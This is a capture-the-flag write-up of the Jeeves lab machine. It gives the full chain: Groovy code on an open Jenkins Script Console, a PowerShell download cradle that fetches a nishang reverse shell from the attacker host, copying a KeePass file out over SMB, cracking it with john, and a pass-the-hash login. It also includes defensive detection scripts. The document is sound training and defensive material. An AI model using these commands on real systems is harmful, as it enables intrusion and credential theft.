
Exploitation Summary
Initial Exploitation
- Vulnerability: Remote code execution via Jenkins Script Console
- Explanation: The Jenkins management console is reachable without login, and its Script Console allows arbitrary code execution on the server
Privilege Escalation
- Vulnerability: Weak master password of keepass file
- Explanation: KeePass is used to store credentials, including some administrative credentials. However, a weak master password protects the KeePass file, leading to exposure of the administrative credentials
Enumeration
nmap -p- -A -T4 10.10.10.63

TCP 80: IIS 10.0
TCP 135: RPC
TCP 445: Microsoft-ds
TCP 50000: Jetty 9.4.z-SNAPSHOT (http)
Initial Shell Exploitation
A quick check on port 445 using smbmap -H 10.10.10.63 shows that credentials are needed, so there’s not much information to gather from port 445. There seem to be two websites running, one on port 80 and another on port 50000. Let’s check out the website on the default port 80 first.

Cool, it looks like we can ask Jeeves some questions. I just randomly type something and click Search.

Oh wow. Am I lucky? Could this be the entry point? I go back and do a few more searches. Interestingly, all of them result in the same error. I then check the source of the search page.

It turns out the search ALWAYS returns the error page, no matter what, so it’s not really doing any dynamic search.
Ok, let’s check out the other website:

Ah, there’s no content on this website.
Directory scan using gobuster
Gobuster does not find any interesting folder on port 80 but is able to find the directory /askjeeves on port 50000 using the following command:
gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,401,403"

Navigate to http://10.10.10.63:50000/askjeeves

Jenkins. Nice, finally found something. What’s even better is that it doesn’t seem to require login, and I can access the Script Console at Manage Jenkins > Script Console.

Jenkins is an open source automation server with hundreds of plugins to support building, deploying and automating any project. The Script Console lets anyone who can reach it execute arbitrary Groovy code on the Jenkins server, so it is only as protected as the login in front of it. For more information about Jenkins, check out https://jenkins.io
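A defender-side check for the exposure just described, added here as an example and not part of the original write-up: it requests /script and /manage from a Jenkins instance without any credentials and reports whether anonymous requests are rejected. The base URL, the path list and the treatment of any non-200 answer as "protected" are assumptions.

```powershell
# Added example, not from the original write-up: verify that a Jenkins
# instance rejects anonymous requests to the Script Console and the
# management page. $BaseUrl and the path list are assumptions.
function Test-JenkinsAnonymousAccess {
    param(
        [Parameter(Mandatory)][string]$BaseUrl,
        # Endpoints that should never answer 200 to an unauthenticated client.
        [string[]]$Paths = @('/script', '/manage')
    )
    foreach ($p in $Paths) {
        $uri = $BaseUrl.TrimEnd('/') + $p
        try {
            # -MaximumRedirection 0 stops a redirect to /login from being
            # followed to a page that would itself return 200.
            $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -MaximumRedirection 0 -ErrorAction Stop
            $status = [int]$resp.StatusCode
        } catch {
            # Non-2xx answers surface as exceptions; pull the status code out
            # of the attached response when there is one.
            $status = if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { 0 }
        }
        [pscustomobject]@{
            Url        = $uri
            StatusCode = $status
            # 200 means the page rendered for an anonymous client, the same
            # exposure that gave code execution in this write-up. 401/403 or a
            # redirect to /login means security is enforced; 0 means no HTTP answer.
            Exposed    = ($status -eq 200)
        }
    }
}

# Usage (hypothetical host): after enabling security, every row should show Exposed = False.
Test-JenkinsAnonymousAccess -BaseUrl 'http://jenkins.example.local:8080' | Format-Table -AutoSize
```

Run it from a machine that is not logged in to Jenkins; a 200 on /script is the finding, while a 403 or a redirect to /login is the expected result once "Enable security" is on and anonymous users have no Overall/Read permission.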
Let’s test by running the command 'whoami' using the following Groovy script:
def sout = new StringBuffer(), serr = new StringBuffer()
String ps = 'whoami'
def proc = ps.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

The command is executed successfully and reveals that the user hosting the website is jeeves\kohsuke
I would like to get a reverse shell using a PowerShell script. Let’s check if PowerShell is available by changing the command to:
String ps = 'cmd /c "cd / && dir powershell.exe /s"'

Nice, PowerShell is available. Now I would like to use Invoke-PowerShellTcp.ps1 from nishang to get a reverse shell.
Set up a web server to host the file Invoke-PowerShellTcp.ps1
If you don’t already have this PowerShell script, you can install nishang with:
apt-get install nishang
I also append the following line so the reverse shell is invoked automatically when the script is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 443

Start netcat listening on port 443
nc -nvlp 443
Run the following script to download Invoke-PowerShellTcp.ps1 and execute it:
def sout = new StringBuffer(), serr = new StringBuffer()
String cmd = "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.34/Invoke-PowerShellTcp.ps1')"
String ps = 'powershell -c "' + cmd + '"'
def proc = ps.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"


Got the user shell!
User flag

Privilege Escalation
Browsing around C:\Users\kohsuke, I quickly find an interesting file, CEH.kdbx, in C:\Users\kohsuke\documents. It looks like a KeePass database used to store and protect credentials.

Download CEH.kdbx using smbserver
impacket-smbserver Share `pwd`

The folder /root/work is now shared under the name Share and is accessible at \\10.10.14.34\Share. Now issue the copy command:
copy CEH.kdbx \\10.10.14.34\Share

Crack the KeePass master password
keepass2john CEH.kdbx > keepass-hash
john keepass-hash --wordlist=/usr/share/wordlists/rockyou.txt

Found the master password: moonshine1
Open CEH.kdbx using KeePass
I download KeePass and install it on my Windows VM to open CEH.kdbx

Enter the master password to reveal the credentials

There’s a bunch of passwords. If any of them is the administrator’s password, we can log in using pth-winexe through port 445.
I tried all the passwords and failed. The very last entry, titled ‘Backup stuff’, is not a password but a password hash, and it looks like an NTLM hash. We can try a pass-the-hash login.
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

Got it. Logged in as administrator.
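On the target, a pass-the-hash session like the one above shows up in the Security log as event 4624 with logon type 3 (network) and authentication package NTLM, the same record a normal NTLM logon with the real password would produce. The following hunt query is an added example, not part of the original write-up: it pulls those events for privileged accounts so that NTLM admin logons from unexpected sources stand out. The account list and the time window are assumptions.

```powershell
# Added example, not from the original write-up: hunt the local Security log
# for NTLM network logons (event 4624, logon type 3) to privileged accounts.
# A pass-the-hash logon looks the same on the target as an NTLM logon with
# the password, so the signal is "NTLM admin logon from an unexpected source".
# The account list and the time window are assumptions.
function Find-NtlmAdminNetworkLogon {
    param(
        [string[]]$PrivilegedAccounts = @('administrator'),
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The interesting fields live in EventData; index them by name.
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.LogonType -eq '3' -and
            $d.AuthenticationPackageName -eq 'NTLM' -and
            $PrivilegedAccounts -contains $d.TargetUserName) {
            [pscustomobject]@{
                Time         = $_.TimeCreated
                Account      = "$($d.TargetDomainName)\$($d.TargetUserName)"
                SourceIp     = $d.IpAddress
                Workstation  = $d.WorkstationName
                LogonProcess = $d.LogonProcessName   # NtLmSsp for these logons
                NtlmVersion  = $d.LmPackageName       # 'NTLM V1' or 'NTLM V2'
            }
        }
    }
}

# Usage: run elevated on the host being watched; review any row whose
# SourceIp or Workstation is not a known management system.
Find-NtlmAdminNetworkLogon -Hours 72 | Format-Table -AutoSize
```

Because the target cannot tell a hash from a password, the durable fixes are to keep the local administrator hash from being harvested in the first place (unique local admin passwords, no secrets in weakly protected vaults) and to block inbound SMB administration from anything other than designated management hosts.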
Root flag
There’s no root.txt, but instead I found hm.txt, which tells me to look deeper. Running dir /R reveals a hidden stream, hm.txt:root.txt, stored as an NTFS Alternate Data Stream. The content of the hidden stream can be retrieved with the following PowerShell command:
Get-Content -Path hm.txt -Stream root.txt
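The command above needs the stream name, which dir /R happened to reveal. To find hidden streams without knowing their names, the following added example (not part of the original write-up) walks a directory tree and lists every stream other than the file's own $DATA stream. The root path is an assumption.

```powershell
# Added example, not from the original write-up: enumerate every alternate
# data stream below a path, so hidden content like hm.txt:root.txt is found
# without knowing the stream name in advance. The root path is an assumption.
function Find-AlternateDataStream {
    param([string]$Path = '.')
    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * lists all streams on the file; ':$DATA' is the normal
            # file content, everything else is an ADS.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $_.FileName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                    }
                }
        }
}

# Usage: Zone.Identifier streams are the normal "downloaded from the internet"
# marker; anything else deserves a look with Get-Content -Stream <name>.
Find-AlternateDataStream -Path 'C:\Users' | Format-Table -AutoSize
```

Streams are only preserved on NTFS, so copying a file to FAT/exFAT media or over many network shares silently drops them; that is worth remembering both when preserving evidence and when wondering why a stream you expected is gone.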

Thank you to Jeeves’s creator, mrb3n!